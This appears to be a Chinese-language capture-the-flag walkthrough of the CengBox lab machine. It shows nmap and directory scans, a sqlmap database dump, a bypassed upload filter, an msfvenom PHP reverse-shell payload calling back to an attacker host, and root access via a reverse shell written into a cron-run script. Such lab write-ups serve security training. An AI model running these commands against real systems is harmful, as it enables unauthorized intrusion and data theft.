题目描述
![](https://img.haomeiwen.com/i17790459/f25da104075cc70f.png)
解题记录
Reconnaissance
使用namp
扫描主机
nmap -sT 192.168.1.11
![](https://img.haomeiwen.com/i17790459/3984f7a3cebf4277.png)
发现80和22端口开放,尝试访问
![](https://img.haomeiwen.com/i17790459/f8e879fb71a3217f.png)
尝试目录爆破
dirsearch -u http://192.168.1.11
dirb http://192.168.1.11 /usr/share/wordlists/dirb/big.txt
扫描出以下几个
http://192.168.1.11/masteradmin
http://192.168.1.11/index.php
直接访问http://192.168.1.11/masteradmin
显示403
继续扫描该目录下的php后缀的文件
http://192.168.1.11/masteradmin/login.php
http://192.168.1.11/masteradmin/upload.php
访问http://192.168.1.11/masteradmin/login.php
,发现登录页面
![](https://img.haomeiwen.com/i17790459/37fb4259cefb6bde.png)
Execution
直接尝试一下sql注入,直接进入上传页面。再使用sqlmap
查看数据库名
![](https://img.haomeiwen.com/i17790459/f878ac27be65951b.png)
sqlmap -r login.txt --dbs
![](https://img.haomeiwen.com/i17790459/1213428099ce9b18.png)
爆破表
sqlmap -r login.txt -D cengbox --dump
![](https://img.haomeiwen.com/i17790459/ec985ce6100cb002.png)
继续回到上传页面,上传一个php一句话木马,失败,页面左上角有提示,这个提示的颜色和背景色很像,不注意根本看不到,根据提示修改后缀为.ceng
上传。
![](https://img.haomeiwen.com/i17790459/ec21f24cf7bdbb84.png)
生成payload,上传成功。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -o re_shell.ceng
![](https://img.haomeiwen.com/i17790459/150f1ff9c3e18bc8.png)
获取shell,发现用户cengover
,使用数据库中发现的密码连接
![](https://img.haomeiwen.com/i17790459/0135c41fc72ec1a1.png)
![](https://img.haomeiwen.com/i17790459/781e720645d7875a.png)
尝试连接
![](https://img.haomeiwen.com/i17790459/7e219692f40ae3c4.png)
发现cengover
的flag
![](https://img.haomeiwen.com/i17790459/c8268b6986340969.png)
Privilege Escalation
使用pspy
提权, Github
![](https://img.haomeiwen.com/i17790459/3e5be54908b15bd8.png)
找到一个可用的
![](https://img.haomeiwen.com/i17790459/d29b976e8b25a0a8.png)
查看该文件的读写权限,
![](https://img.haomeiwen.com/i17790459/64b97647eac043c1.png)
生成反弹shell,写入/opt/md5check.py
![](https://img.haomeiwen.com/i17790459/6488b32a6ef6b1f6.png)
在msfconsole
等待连接即可,得到root权限
![](https://img.haomeiwen.com/i17790459/4a320e8a09e9a1ba.png)
网友评论